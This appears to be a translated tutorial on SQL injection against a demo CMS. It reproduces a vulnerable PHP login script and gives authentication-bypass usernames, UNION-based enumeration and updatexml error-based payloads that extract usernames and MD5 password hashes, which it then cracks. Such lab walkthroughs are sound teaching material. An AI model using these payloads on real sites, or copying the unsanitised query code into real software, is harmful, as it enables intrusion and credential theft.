SQL injection cases and principles

SQL injection cases and principles

Foreword

This time we will simply learn SQL injection cases and principles

1. What is SQL injection?

SQL injection means that the web application does not judge the legality of the user input data or does not filter it strictly. The attacker can add additional SQL statements at the end of the pre-defined query statements in the web application without the administrator’s knowledge. Implement illegal operations under certain conditions, thereby deceiving the database server to perform unauthorized arbitrary queries, thereby further obtaining corresponding data information.

2. Log in to the web management system through a universal username

Universal username

These two are universal user names. The actual operation will be carried out below.

1. aaa’ or 1=1 #

2. aaa’ or 1’=\’1

First enter the background management in the demo website
You can see a login interface
Enter a username and password here to log in/Username: admin Password: password
You can see that the login failed

Using bp packet capture, you can find that the login package is a POST request, and you can see the username and password we just entered, and the request echo is 200
This time we use the universal username to log in/username:aaa' or 1=1 # Password: 1

Found that you can log in, the user name is the universal user name we just entered
Use bp packet capture to view, the special characters contained in the user name entered in the POST request package become the URL For encoding, ‘ is ', spaces are + , equal sign is =, and pound sign is #. In the echo, it is found that the password has changed to MD5 format.

From this it can be inferred that there is a problem with the source code of this web page

Analysis

The following is the source code file

<?php
session_start ();
header('Content-Type: text/html; charset=utf-8');
include_once ("../include/config.inc.php");
if (isset ( $_POST ["username"] )) {
$username = $_POST ["username"];
} else {
$username = "";
}
if (isset ( $_POST ["password"] )) {
$password = $_POST ["password"];
} else {
$password = "";
}
//Remember Account Name
setcookie (username, $username,time() + 3600*24*365);
if (empty($username)||empty($password)){
exit("<script>alert('Username or password cannot be empty!');window.history.go(-1)</script>");
}
$user_row = $db->getOneRow("select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'" );
echo "select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'";
if (!empty($user_row )) {
setcookie (userid, $user_row ['userid'] );
header("Location: index.php");
}else{
//echo "select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."'";
exit("<script>alert('The username or password is incorrect!');window.history.go(-1)</script>");
}
?>

$user_row = $db->getOneRow("select userid from cms_users where username = '".$username."' and password='".md5 ( $password ) ."\ '");
//It can be seen that the SQL statement is included. The login verification method is to query the information of the users table in the cms database through select to determine whether the user exists.

We substitute the universal username into

$user_row = $db->getOneRow("select userid from cms_users where username = 'aaa' or 1=1 #".$username."' and password='".md5 ( $password ) ."'");
This can be divided into two sections, namely
1.$user_row = $db->getOneRow("select userid from cms_users where username = 'aaa' or 1=1 #
2.".$username."' and password='".md5 ( $password ) ."'");
The second paragraph becomes a comment. The first paragraph can be understood as using the `or` operator. If one is true, all are true. Among them, `1=1` is true, and all are always true. The following `#` is a comment. content

3. Joint query

Enter the page and click on an article. You can see ?id=33 and change 33 to 34.

It was found that the content of the web page changed after changing ?id=33 to ?id=34 Now add ' after ?id=34 to see what changes

The tool used here is HackBar. I found an error on the web page Analyze the error message

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’’ at line 1

The main content to look at is near '''. One of the ' is what we input. According to the SQL statement, it should be select FUZZ from FUZZ where id =34, because one more ' was entered and all errors were reported. In addition, the id obtained is a numeric type, not a string type.
Add and 1=1 after id=34 and find that the web page information will be displayed again.
Determine the number of columns by order by
It shows that there are no 100 columns. Use the binary search method to continue to judge, and finally find that there are only 15 rows.
Use union query to determine the number of display digitsunion select 1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15
Found that there is no change. This is because id=34 needs to be changed to False, here we change it to id=-34
Found that 3 and 11 have echoes. We changed 3 to version(), and 11 to database() to see the results.
In this way, the original position of 3 becomes the database version,·11 becomes the name of the database

4. Obtain the background administrator account password

There are four methods, among which Boolean blind injection and delayed injection are extremely costly and should be implemented with caution.

1.Joint query

First query all table names in the cms library
where count(*) is the number of tables displayed, hex (group_concat(table_name)) is the display table name. You can use the Decoder conversion in bp here. information_schema.tables where table_schema=database() is the library being queried.
Query the information of cms_users table and find that there are two users. The first user is shown here.
Use limit 1,1 to query the second user

2. Error injection

First query the library name

updatexml(1,concat(0x5e,(select database()),0x5e),1)

Query the number of tables in the cms database

id=34 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)

Get the table names one by one

updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)

The eighth table is the cms_users table
Query several data in the cms_users table. 0x636d735f7573657273 is the hexadecimal conversion of cms_users

updatexml(1,concat(0x5e,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273),0x5e),1)

Query each data

updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)

They are userid, username, password, because userid is of little use, the main focus is on username and password

updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)//Query the first username in the username table

This is the second username The password of query admin is [e10adc3949ba59abbe56e057f20f883e](https://www.somd5.com/),123456

updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1)
updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1)
//Because it is a 32-bit password encrypted by MD5, all queries are performed in two times.

The password to query ajest is the same as above, the password is cbff36039c3d0212b3e34c23dcde1456, 123.com
I can’t stand it anymore, I’ll talk about Boolean blind injection and delayed injection later.